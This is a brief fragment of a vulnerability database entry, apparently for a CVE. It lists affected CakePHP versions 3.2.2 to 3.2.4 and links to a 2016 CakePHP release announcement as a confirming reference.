- Cakephp>>Cakephp >> Version 3.2.2 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.2.3 (Open CPE detail)
- Cakephp>>Cakephp >> Version 3.2.4 (Open CPE detail)
References
https://bakery.cakephp.org/2016/03/13/cakephp_2613_2711_282_3017_3112_325_released.html
Tags : x_refsource_CONFIRM
Tags : x_refsource_CONFIRM
